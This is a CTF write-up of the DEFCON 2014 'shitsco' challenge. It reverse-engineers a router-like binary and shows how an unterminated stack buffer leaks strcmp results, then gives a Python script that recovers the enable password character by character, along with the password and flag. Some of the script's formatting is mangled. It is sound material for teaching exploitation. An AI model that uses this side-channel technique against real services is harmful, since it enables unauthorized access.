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DEFCON Capture the Flag Qualification Challenge #1


I constantly challenge myself to gain deeper knowledge in reverse engineering, vulnerability discovery, and exploit mitigations. By day, I channel this knowledge and passion into my job as a security researcher at Endgame. By night, I use these skills as a Capture the Flag code warrior. I partook in the DEFCON CTF qualification round this weekend to help sharpen these skills and keep up with the rapid changes in reverse engineering technology. DEFCON CTF qualifications are a fun, and sometimes frustrating, way to cultivate my skillset by solving challenges alongside my team, Samurai.

CTF Background

For those of you who aren’t familiar with a computer security CTF game, Wikipedia provides a simple explanation. The qualification round for the DEFCON CTF is run jeopardy style while the actual game is an attack/defense model. Qualifications ran all weekend for 48 hours with no breaks. Since 2013 the contest has been run by volunteers belonging to a hacker club called the Legitimate Business Syndicate, which is partly comprised of former Samurai members. They did a fantastic job with qualifications this year and ran a smooth game with almost no downtime, solid technical challenges, round the clock support and the obligatory good-natured heckling. As a fun exercise, let’s walk through an interesting problem from the game. All of the problems from the CTF game can be found here.

Problem Introduction

The first challenge was written by someone we’ll call Mr. G and was worth 2 points. Upon opening the challenge you are presented with the following text:

http://services.2014.shallweplayaga.me/shitsco_c8b1aa31679e945ee64bde1bdb19d035 is running at:


Capture the flag.

Downloading the shitsco_c8b1aa31679e945ee64bde1bdb19d035 file and running the “file” command reveals:

user@ubuntu:~$  file shitsco

shitsco: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0x8657c9bdf925b4864b09ce277be0f4d52dae33a6, stripped

This is an ELF file that we can assume will run on a Linux 32-bit OS. Symbols were stripped to make reverse engineering a bit more difficult. At least it is not statically linked. I generally like to run strings on a binary at this point to get a quick sense of what might be happening in the binary. Doing this shows several string APIs imported and text that looks to be indicative of a command prompt style interface. Let’s run the binary to confirm this:

user@ubuntu:~$  ./shitsco
Failed to open password file: No such file or directory

Ok, the program did not do what I expected. We will need to add a user shitsco and create a file in his home directory called password. I determined this by running:

shitsco@ubuntu:~$  sudo strace ./shitsco
open("/home/shitsco/password", O_RDONLY) = -1 ENOENT (No such file or directory)

We can see that the file /home/shitsco/password was opened for reading and that this failed (ENOENT) because the file did not exist. You should create this file without a new line on the end or you might have trouble later on. I discovered this through trial and error. After creating the file we get better results:

shitsco@ubuntu:~$  echo –n asdf > /home/shitsco/password
shitsco@ubuntu:~$  ./shitsco

  oooooooo8 oooo        o88    o8
888         888ooooo   oooo o888oo  oooooooo8    ooooooo     ooooooo
 888oooooo  888   888   888  888   888ooooooo  888     888 888     888
        888 888   888   888  888           888 888         888     888
o88oooo888 o888o o888o o888o  888o 88oooooo88    88ooo888    88ooo88

Welcome to Shitsco Internet Operating System (IOS)
For a command list, enter ?

$ ?
==========Available Commands==========
|enable                               |
|ping                                 |
|tracert                              |
|?                                    |
|shell                                |
|set                                  |
|show                                 |
|credits                              |
|quit                                 |
Type ? followed by a command for more detailed information

This looks like fun. We have what looks to be a router prompt. Typically, the goal with these binary exploitation problems is to identify somewhere that user input causes the program to crash and then devise a way to make that input take control over the program and reveal a file called flag residing on the remote machine. At this point, I have two choices. I can play around with the input to see if I can get it to crash or I can dive into the reverse engineering. I opted to play around with the input and the first thing that caught my attention was the shell command!

Welcome to Shitsco Internet Operating System (IOS)
For a command list, enter ?
$ shell

No way, it couldn’t be that easy. Waiting 5 seconds produces:

Yeah, right.

Ok, let the taunting begin. We can ignore the shell command. Thanks for the laugh Mr. G. By playing with the command line interface, I found the command input length was limited to 80 characters with anything coming after 80 characters applying to the next command. The set and show commands looked interesting, but even adding 1000 variables of different lengths failed to produce any interesting behavior. Typically, I am looking for a way to crash the program at this point.

What really looked like the solution came from the enable command:

$ enable
Please enter a password: asdf
Authentication Successful
# ?
==========Available Commands==========
|enable                               |
|ping                                 |
|tracert                              |
|?                                    |
|flag                                 |
|shell                                |
|set                                  |
|show                                 |
|credits                              |
|quit                                 |
|disable                              |
Type ? followed by a command for more detailed information
# flag
The flag is: foobarbaz

The password for the enable prompt comes from the password file we created earlier. I also created a file in /home/shitsco/ called flag with the contents foobarbaz; which is now happily displayed on my console. The help (? command) after we enter “enabled mode” has two extra commands: disable and flag. So, if I can get the enable password on the remote machine, then I can simply run the flag command and score points on the problem. Ok, we have a plan, but how to crack that password?

The “Enable” Password

To recover this password, the first option that comes to mind is brute force. This is usually an option of last resort in CTF competitions. Just think about what could happen to this poor service if 1000 people decided to brute force the challenge. Having an inaccessible service spoils the fun for others playing. It’s time to dive a bit deeper and see if there is anything else we could try.

I tried long passwords, passwords with format strings such as %s, empty passwords, and passwords with binary data. None of these produced any results. However, a password length of 5 caused a strange behavior:

$ enable
Please enter a password: AAAAA
Nope.  The password isn't AAAAA▒r▒@▒r▒▒ο`M_▒`▒▒▒t▒

Ok, that looks like we’re getting extra memory back. If we look at it as hex we see:

shitsco@ubuntu:~$  echo -e enable\\nAAAAA\\n | ./shitsco | xxd
0000220: 2020 5468 6520 7061 7373 776f 7264 2069    The password i
0000230: 736e 2774 2041 4141 4141 f07c b740 f47c  sn't AAAAA.|.@.|
0000240: b792 90c1 bf60 c204 0808 8d69 b760 c204  .....`.....i.`..
0000250: 08a0 297f b701 0a24 200a 3a20 496e 7661  ..)....$ .: Inva
0000260: 6c69 6420 636f 6d6d 616e 640a 2420       lid command.$

The bit that starts 0xf0 0x7c is the start of the memory disclosure. Looking a little further, we see 0x60 0xc2 0x04 0x08. This looks like it could be a little endian encoded pointer for 0x0804c260. This is pretty cool and all, but where is the password?

I tried sending in all possible password lengths and it was always leaking the same amount of data. But the leak only worked if the password is more than 4 characters. It’s time to turn to IDA Pro and focus in on the function for the enable command.

This is the disassembly for the function responsible for handling the enable command. It is easy to find with string cross references:

.text:08049230 enable          proc near               ; DATA XREF: .data:0804C270o
.text:08049230 dest            = dword ptr -4Ch
.text:08049230 src             = dword ptr -48h
.text:08049230 n               = dword ptr -44h
.text:08049230 term            = byte ptr -40h
.text:08049230 s2              = byte ptr -34h
.text:08049230 var_14          = dword ptr -14h
.text:08049230 cookie          = dword ptr -10h
.text:08049230 arg_0           = dword ptr  4
.text:08049230                 push    esi
.text:08049231                 push    ebx
.text:08049232                 sub     esp, 44h
.text:08049235                 mov     esi, [esp+4Ch+arg_0]
.text:08049239                 mov     eax, large gs:14h
.text:0804923F                 mov     [esp+4Ch+cookie], eax
.text:08049243                 xor     eax, eax
.text:08049245                 mov     eax, [esi]
.text:08049247                 test    eax, eax
.text:08049249                 jz      loc_80492D8
.text:0804924F                 lea     ebx, [esp+4Ch+s2]
.text:08049253                 mov     [esp+4Ch+n], 20h ; n
.text:0804925B                 mov     [esp+4Ch+src], eax ; src
.text:0804925F                 mov     [esp+4Ch+dest], ebx ; dest
.text:08049262                 call    _strncpy
.text:08049267 loc_8049267:                            ; CODE XREF: enable+EDj
.text:08049267                 mov     [esp+4Ch+src], ebx ; s2
.text:0804926B                 mov     [esp+4Ch+dest], offset password_mem ; s1
.text:08049272                 call    _strcmp
.text:08049277                 mov     [esp+4Ch+var_14], eax
.text:0804927B                 mov     eax, [esp+4Ch+var_14]
.text:0804927F                 test    eax, eax
.text:08049281                 jz      short loc_80492B8
.text:08049283                 mov     [esp+4Ch+n], ebx
.text:08049287                 mov     [esp+4Ch+src], offset aNope_ThePasswo ; "Nope.  The password isn't %s\n"
.text:0804928F                 mov     [esp+4Ch+dest], 1
.text:08049296                 call    ___printf_chk
.text:0804929B loc_804929B:                            ; CODE XREF: enable+A5j
.text:0804929B                 mov     [esp+4Ch+dest], esi
.text:0804929E                 call    sub_8049090
.text:080492A3                 mov     eax, [esp+4Ch+cookie]
.text:080492A7                 xor     eax, large gs:14h
.text:080492AE                 jnz     short loc_8049322
.text:080492B0                 add     esp, 44h
.text:080492B3                 pop     ebx
.text:080492B4                 pop     esi
.text:080492B5                 retn
.text:080492B5 ; ---------------------------------------------------------------------------
.text:080492B6                 align 4
.text:080492B8 loc_80492B8:                            ; CODE XREF: enable+51j
.text:080492B8                 mov     [esp+4Ch+dest], offset aAuthentication ; "Authentication Successful"
.text:080492BF                 mov     ds:admin_privs, 1
.text:080492C9                 mov     ds:prompt, 23h
.text:080492D0                 call    _puts
.text:080492D5                 jmp     short loc_804929B
.text:080492D5 ; ---------------------------------------------------------------------------
.text:080492D7                 align 4
.text:080492D8 loc_80492D8:                            ; CODE XREF: enable+19j
.text:080492D8                 mov     [esp+4Ch+src], offset aPleaseEnterAPa ; "Please enter a password: "
.text:080492E0                 lea     ebx, [esp+4Ch+s2]
.text:080492E4                 mov     [esp+4Ch+dest], 1
.text:080492EB                 call    ___printf_chk
.text:080492F0                 mov     eax, ds:stdout
.text:080492F5                 mov     [esp+4Ch+dest], eax ; stream
.text:080492F8                 call    _fflush
.text:080492FD                 mov     dword ptr [esp+4Ch+term], 0Ah ; term
.text:08049305                 mov     [esp+4Ch+n], 20h ; a3
.text:0804930D                 mov     [esp+4Ch+src], ebx ; a2
.text:08049311                 mov     [esp+4Ch+dest], 0 ; fd
.text:08049318                 call    read_n_until
.text:0804931D                 jmp     loc_8049267
.text:08049322 ; ---------------------------------------------------------------------------
.text:08049322 loc_8049322:                            ; CODE XREF: enable+7Ej
.text:08049322                 call    ___stack_chk_fail
.text:08049322 enable          endp

Here is the C decompiled version of the function that is a bit clearer:

int __cdecl enable(const char **a1)
  const char *v1; // ebx@2
  char s2[32]; // [sp+18h] [bp-34h]@2
  int v4; // [sp+38h] [bp-14h]@3
  int cookie[4]; // [sp+3Ch] [bp-10h]@1

  cookie[0] = *MK_FP(__GS__, 20);
  if ( *a1 )
   v1 = s2;
   strncpy(s2, *a1, 32u);
   v1 = s2;
   __printf_chk(1, "Please enter a password: ");
   read_n_until(0, (int)s2, 32, 10);
  v4 = strcmp((const char *)password_mem, v1);
  if ( v4 )
   __printf_chk(1, "Nope.  The password isn't %s\n", v1);
   admin_privs = 1;
   prompt = '#';
   puts("Authentication Successful");
  sub_8049090((void **)a1);
  return *MK_FP(__GS__, 20) ^ cookie[0];

I’ve labeled a few things here like the local variables and the recv_n_until function. Notice that s2 or [esp+4Ch+src] is the destination buffer for the password we enter. It also looks possible to run enable < password > and not get prompted for the password. This results in a strncpy and the other prompting path read the password with a call to recv_n_until. Here is the interesting thing: When I tried the strncpy code path, I did not get the leak behavior:

$ enable
Please enter a password: AAAAA
Nope.  The password isn't AAAAA`x▒@dx▒▒▒`▒d▒`▒▒▒z▒
$ enable AAAAA
Nope.  The password isn't AAAAA

So, what is the difference? Let’s have a quick look at the strncpy man page, namely the bit that says “If the length of src is less than n, strncpy() writes additional null bytes to dest to ensure that a total of n bytes are written.” On the prompting code path, our string is not being null terminated but if we enter the password with the enable command it is null terminated. We can also see that the s2 variable on the stack is never initialized to 0. There is no memset call.

Still we don’t have the password. It doesn’t exist in the leaked data. Leaks are very useful in exploitation as a defeat to ASLR. We might have enough information here to recover base addresses of the stack or libc. However, the path we are on to get the flag does not involve taking advantage of memory corruption. Is there anything in this leak that could give us something useful?

To answer this question let’s look at the stack layout and what is actually getting printed back to us:

.text:08049230 dest            = dword ptr -4Ch
.text:08049230 src             = dword ptr -48h
.text:08049230 n               = dword ptr -44h
.text:08049230 term            = byte ptr -40h
.text:08049230 s2              = byte ptr -34h
.text:08049230 var_14          = dword ptr -14h
.text:08049230 cookie          = dword ptr -10h
.text:08049230 arg_0           = dword ptr  4

Therefore, if we are copying into s2 and we only leak data after the 4th character, we can assume that by default in the uninitialized stack there is a null at s2[3]. Overwriting this with user data causes our string to not terminate until we run into a null later on up the stack. What is var_14?

v4 = strcmp((const char *)password_mem, v1);

It turns out that var_14 (or v4) is the return from strcmp. Hummm. Here is what the main page has to say about that “The strcmp() and strncmp() functions return an integer less than, equal to, or greater than zero if s1 (or the first n bytes thereof) is found, respectively, to be less than, to match, or be greater than s2.” What this means is that we can tell if our input string is less than or greater than the password on the remote machine. Let’s try it locally first. Our password locally is “asdf”. Let’s see if we can divine the first character using this method. The var_14 variable should be the 33rd character we get back:

shitsco@ubuntu:~$  python -c "import sys;sys.stdout.write('enable\n' + ''*80 + '\n')" | ./shitsco |xxd
0000210: 2070 6173 7377 6f72 643a 204e 6f70 652e   password: Nope.
0000220: 2020 5468 6520 7061 7373 776f 7264 2069    The password i
0000230: 736e 2774 2020 2020 2020 2020 2020 2020  sn't
0000240: 2020 2020 2020 2020 2020 2020 2020 2020
0000250: 2020 2020 2001 0a24 200a 2020 2020 2020       ..$ .

I picked the space character for our password because on the ascii table space (0x20) is the lowest value printable character. We can see that the bit in bold here was 0x0100 as var_14. The null after the 0x1 is implied. Now, what happens if we set this to ‘a’ + 79 spaces?

shitsco@ubuntu:~$ python -c "import sys;sys.stdout.write('enable\na' + ''*79 + '\n')" | ./shitsco |xxd
0000220: 2020 5468 6520 7061 7373 776f 7264 2069    The password i
0000230: 736e 2774 2061 2020 2020 2020 2020 2020  sn't a
0000240: 2020 2020 2020 2020 2020 2020 2020 2020
0000250: 2020 2020 2001 0a24 200a 2020 2020 2020       ..$ .
0000260: 2020 2020 2020 2020 2020 2020 2020 2020

Remember, that ‘a’ was actually the first character of our password locally and we still got a 0x1 back. How about ‘b’?

shitsco@ubuntu:~$ python -c "import sys;sys.stdout.write('enable\nb' + ''*79 + '\n')" | ./shitsco |xxd
0000220: 2020 5468 6520 7061 7373 776f 7264 2069    The password i
0000230: 736e 2774 2062 2020 2020 2020 2020 2020  sn't b
0000240: 2020 2020 2020 2020 2020 2020 2020 2020
0000250: 2020 2020 20ff ffff ff0a 2420 0a20 2020       .....$ .
0000260: 2020 2020 2020 2020 2020 2020 2020 2020

Bingo. Here we have a value of 0xffffffff for var_14. Therefore, we know that the string we sent in is numerically higher than the actual password. The last character we tried, ‘a’, was still giving us back 0x01. When we see the value of var_14 change to -1 we know that the correct character was not the most recent attempt but the one prior to it. We can send all characters sequentially until we find the password.


The password used on the remote server is probably short enough that we could disclose it by hand. However, as a general rule in life, if I have to do something more than a few times I almost always save time by writing a quick python script to automate. Since we are going to be running this on a remote target I’ve set the server to run over a TCP port with some fancy piping over a fifo pipe.

shitsco@ubuntu:~$ mkfifo pipe
shitsco@ubuntu:~$ nc -l 31337 < pipe | ./shitsco > pipe

Here is a python script that will discover the password used. I’ve changed the password file on my local system to the one that was used during the game:

import socket
import string
import sys


s.connect(("", 31337))

def try_pass(passwd):
s.send(passwd + "\n")
ret = s.recv(1024)
if ret.find("Authentication Successful") != -1:
return "!"
return ret[ret.find("$")-2]

chars = []
for x in string.printable:

known = ""
while 1:
prev = chars[0]
for x in chars:

i = try_pass(known + x + "" * (30-len(known)))
if ord(i) == 0xff:
known += prev
prev = x

i = try_pass(known[:-1]+x+"\x00")
if i == '!':
print "Enable password is: %s" % (known[:-1]+x)

Running the script produces the output:

$ python shitsco.py
Enable password is: bruT3m3hard3rb4by

Excellent, let’s connect to the service with netcat and retrieve the flag:

$ nc shitsco_c8b1aa31679e945ee64bde1bdb19d035.2014.shallweplayaga.me 31337

 oooooooo8 oooo        o88    o8
888         888ooooo   oooo o888oo  oooooooo8    ooooooo     ooooooo
 888oooooo  888   888   888  888   888ooooooo  888     888 888     888
       888 888   888   888  888           888 888         888     888
o88oooo888 o888o o888o o888o  888o 88oooooo88    88ooo888    88ooo88

Welcome to Shitsco Internet Operating System (IOS)
For a command list, enter ?
$ enable bruT3m3hard3rb4by
Authentication Successful
# flag
The flag is: 14424ff8673ad039b32cfd756989be12

All that’s left to do is submit the flag and score points!

I’ll be posting another challenge and solution from the CTF soon, so if you found this one interesting, be sure to check back for more.

DEFCON Capture the Flag Qualification Challenge #1

Steve Vittitoe

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